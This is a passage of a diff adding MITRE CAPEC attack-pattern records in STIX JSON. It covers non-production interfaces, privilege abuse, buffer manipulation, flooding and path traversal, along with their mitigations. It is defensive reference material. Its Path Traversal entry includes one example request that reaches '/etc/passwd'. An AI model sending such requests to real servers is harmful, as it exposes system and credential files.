These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement.\n ", + "\n Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Vulnerable Interface: An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.

  2. Techniques
    If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Exploit

  1. Leverage Test Interface to Execute Attacks: Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.

  2. Techniques
    The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more.
", + "x_capec_extended_description": "\n Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.\n Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--80649f3c-d2f3-4703-9e78-e096673a7517" + ], + "x_capec_prerequisites": [ + "The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment." + ], + "x_capec_resources_required": [ + "For some interfaces, the adversary will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an adversary may need to be able to authenticate to the target before it can access the vulnerable interface." + ], + "x_capec_skills_required": { + "High": "Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments.", + "id": "course-of-action--5d87e697-369a-4c96-a265-70c9a99bcc01", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-121-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9337f1a1-389b-4fca-8da7-80a10dc44926", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d87e697-369a-4c96-a265-70c9a99bcc01", + "target_ref": "attack-pattern--b289975f-c5e0-4d27-bf50-5937bfd02cfd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. 
Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. 
Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." 
+ ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Configure account privileges such privileged/administrator functionality is not exposed to non-privileged/lower accounts.", + "id": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-122-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--957019cc-30e1-4d46-9ee9-1b20f9b69653", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--556e719c-c102-427d-b5b4-11a4dab62f8e", + "target_ref": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates an application's interaction with a buffer in an attempt to read or modify data they shouldn't have access to. Buffer attacks are distinguished in that it is the buffer space itself that is the target of the attack rather than any code responsible for interpreting the content of the buffer. In virtually all buffer attacks the content that is placed in the buffer is immaterial. 
Instead, most buffer attacks involve retrieving or providing more input than can be stored in the allocated buffer, resulting in the reading or overwriting of other unintended program memory.", + "external_references": [ + { + "external_id": "CAPEC-123", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/123.html" + }, + { + "external_id": "CWE-119", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/119.html" + } + ], + "id": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Buffer Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A buffer manipulation attack often results in a crash of the application due to the corruption of memory.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Modify Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)", + "Read Data (If constructed properly, a buffer manipulation attack can be used to contol the execution of the application leading to any number of negative consequenses.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--77e51461-7843-411c-a90e-852498957f76", + "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96" + ], + "x_capec_prerequisites": [ + "The adversary must identify a programmatic means for interacting with a buffer, such as vulnerable C code, and be able to provide input to this interaction." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To help protect an application from buffer manipulation attacks, a number of potential mitigations can be leveraged. Before starting the development of the application, consider using a code language (e.g., Java) or compiler that limits the ability of developers to act beyond the bounds of a buffer. If the chosen language is susceptible to buffer related issues (e.g., C) then consider using secure functions instead of those vulnerable to buffer manipulations. If a potentially dangerous function must be used, make sure that proper boundary checking is performed. Additionally, there are often a number of compiler-based mechanisms (e.g., StackGuard, ProPolice and the Microsoft Visual Studio /GS flag) that can help identify and protect against potential buffer issues. 
Finally, there may be operating system level preventative functionality that can be applied.", + "id": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-123-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b2e47286-34b7-484e-a95b-67f1b21ae24b", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--69611262-87d4-4bba-8db4-068c40577c4c", + "target_ref": "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a resource shared between multiple applications, an application pool or hardware pin multiplexing to affect behavior. Resources may be shared between multiple applications or between multiple threads of a single application. Resource sharing is usually accomplished through mutual access to a single memory location or multiplexed hardware pins. If an adversary can manipulate this shared resource (usually by co-opting one of the applications or threads) the other applications or threads using the shared resource will often continue to trust the validity of the compromised shared resource and use it in their calculations. 
This can result in invalid trust assumptions, corruption of additional data through the normal operations of the other users of the shared resource, or even cause a crash or compromise of the sharing applications.", + "external_references": [ + { + "external_id": "CAPEC-124", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/124.html" + }, + { + "external_id": "CWE-1189", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1189.html" + }, + { + "external_id": "CWE-1331", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1331.html" + } + ], + "id": "attack-pattern--d5e0c12f-6086-491d-86e5-e10a14d1f947", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Shared Resource Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_prerequisites": [ + "The target applications, threads or functions must share resources between themselves.", + "The adversary must be able to manipulate some piece of the shared resource either directly or indirectly and the other users of the data must accept the changed data as valid. Usually this requires that the adversary be able to compromise one of the sharing applications or threads in order to manipulate the shared data." + ], + "x_capec_resources_required": [ + "None: The attacker does not need any specialized resources to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary consumes the resources of a target by rapidly engaging in a large number of interactions with the target. This type of attack generally exposes a weakness in rate limiting or flow. 
When successful this attack prevents legitimate users from accessing the service and can cause the target to crash. This attack differs from resource depletion through leaks or allocations in that the latter attacks do not rely on the volume of requests made to the target but instead focus on manipulation of the target's operations. The key factor in a flooding attack is the number of requests the adversary can make in a given period of time. The greater this number, the more likely an attack is to succeed against a given target.", + "external_references": [ + { + "external_id": "CAPEC-125", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/125.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service: Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + }, + { + "description": "Endpoint Denial of Service", + "external_id": "T1499", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499" + }, + { + "description": "Denial of Service", + "external_id": "10", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Denial-of-Service" + }, + { + "description": "Traffic flood", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Traffic_flood" + } + ], + "id": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Flooding", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (A successful flooding attack compromises the 
availability of the target system's service by exhausting its available resources.)", + "Resource Consumption (A successful flooding attack compromises the availability of the target system's service by exhausting its available resources.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--172e2289-333b-4796-9afd-94140c9480e8", + "attack-pattern--bb4d350b-c500-45d6-97c2-c0adccbe6bad", + "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "attack-pattern--c3ce7043-a2cc-4686-945c-cf3b605b7c90" + ], + "x_capec_prerequisites": [ + "Any target that services requests is vulnerable to this attack on some level of scale." + ], + "x_capec_resources_required": [ + "A script or program capable of generating more requests than the target can handle, or a network or cluster of objects all capable of making simultaneous requests." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that protocols have specific limits of scale configured.", + "id": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22178117-f064-4303-8985-7fd9ee2fe9d8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55bca578-149c-4129-a003-3c2d5bd54b5b", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Specify expectations for capabilities and dictate which behaviors are acceptable when resource allocation reaches limits.", + "id": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0a57d15-98a3-44ab-9dee-7451762bc00b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], 
+ "relationship_type": "mitigates", + "source_ref": "course-of-action--c8dd811c-2eb5-418e-aeda-80170abad702", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Uniformly throttle all requests in order to make it more difficult to consume resources more quickly than they can again be freed.", + "id": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-125-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--22e10e44-9d16-4de8-9376-289ccde29247", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6c5ef0e0-77e5-40d3-85bf-7c50693c211d", + "target_ref": "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses path manipulation methods to exploit insufficient input validation of a target to obtain access to data that should be not be retrievable by ordinary well-formed requests. A typical variety of this attack involves specifying a path to a desired file together with dot-dot-slash characters, resulting in the file access API or function traversing out of the intended directory structure and into the root file system. 
By replacing or modifying the expected path information the access function or API retrieves the file desired by the attacker. These attacks either involve the attacker providing a complete path to a targeted file or using control characters (e.g. path separators (/ or \\) and/or dots (.)) to reach desired directories or files.", + "external_references": [ + { + "external_id": "CAPEC-126", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/126.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "description": "Path Traversal", + "external_id": "33", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Path-Traversal" + }, + { + "description": "Path Traversal", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Path_Traversal" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "OWASP Testing Guide (v4), 2010, The Open Web Application Security Project (OWASP)", + "external_id": "REF-9", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001)" + }, + { + "description": "WASC Threat Classification 2.0, 2010, The Web Application Security Consortium (WASC)", + "external_id": "REF-10", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246952/Path-Traversal" + } + ], + "id": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Path Traversal", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Directory Traversal" + ], + "x_capec_can_precede_refs": [ + 
"attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Unreliable Execution (The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software.)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Read Data (The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries.)", + "Modify Data (The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. 
For example, appending a new account at the end of a password file may allow an attacker to bypass authentication.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An example of using path traversal to attack some set of resources on a web server is to use a standard HTTP request\n http://example/../../../../../etc/passwd\n From an attacker point of view, this may be sufficient to gain access to the password file on a poorly protected system. If the attacker can list directories of critical resources then read only access is not sufficient to protect the system.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Fingerprinting of the operating system: In order to perform a valid path traversal, the attacker needs to know what the underlying OS is so that the proper file seperator is used.

  2. Techniques
    Port mapping. Identify ports that the system is listening on, and attempt to identify inputs and protocol types on those ports.
    TCP/IP Fingerprinting. The attacker uses various software to make connections or partial connections and observe idiosyncratic responses from the operating system. Using those responses, they attempt to guess the actual operating system.
    Induce errors to find informative error messages
  3. Survey the Application to Identify User-controllable Inputs: The attacker surveys the target application to identify all user-controllable file inputs

Experiment

  1. Vary inputs, looking for malicious results: Depending on whether the application being exploited is a remote or local one, the attacker crafts the appropriate malicious input containing the path of the targeted file or other file system control syntax to be passed to the application

Exploit

  1. Manipulate files accessible by the application: The attacker may steal information or directly manipulate files (delete, copy, flush, etc.)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--b2d76f31-f1e3-4797-a19f-246859422074", + "attack-pattern--1a84fe86-379b-497e-ae66-290e797409f4", + "attack-pattern--36fd3642-e601-4392-b25b-48df2fdecf62" + ], + "x_capec_prerequisites": [ + "The attacker must be able to control the path that is requested of the target.", + "The target must fail to adequately sanitize incoming paths" + ], + "x_capec_resources_required": [ + "The ability to manually manipulate path information either directly through a client application relative to the service or application or via a proxy application." + ], + "x_capec_skills_required": { + "Low": "Simple command line attacks or to inject the malicious payload in a web page.", + "Medium": "Customizing attacks to bypass non trivial filters in the application." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Configure the access control correctly.", + "id": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--990d82cc-54c9-4536-8db1-9e1e4d3c1162", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--49faa4e3-77fa-4b56-8186-be9d4302e09a", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Enforce principle of least privilege.", + "id": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fc0b9ea2-577b-4cae-a52b-606ae9ea8f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--10e0bdfb-cc84-4788-8d10-225b6e61f135", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. 
Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", + "id": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--594c4c5a-1764-41b8-91aa-dc032c6ae92a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--59bcc683-a1e5-4b88-9821-ddb734003114", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Input validation. Assume that user inputs are malicious. 
Utilize strict type, character, and encoding enforcement.", + "id": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f114c5f3-cfbd-4300-b255-e4bfeb5672be", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6a928417-72f9-4429-951c-8dcaca5edc6d", + "target_ref": "attack-pattern--faf0ec21-da60-4efc-8c8e-7a6b63bea170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Proxy communication to host, so that communications are terminated at the proxy, sanitizing the requests before forwarding to server host.", + "id": "course-of-action--da440d05-dc0e-4bfa-8490-7178ae419336", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-126-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 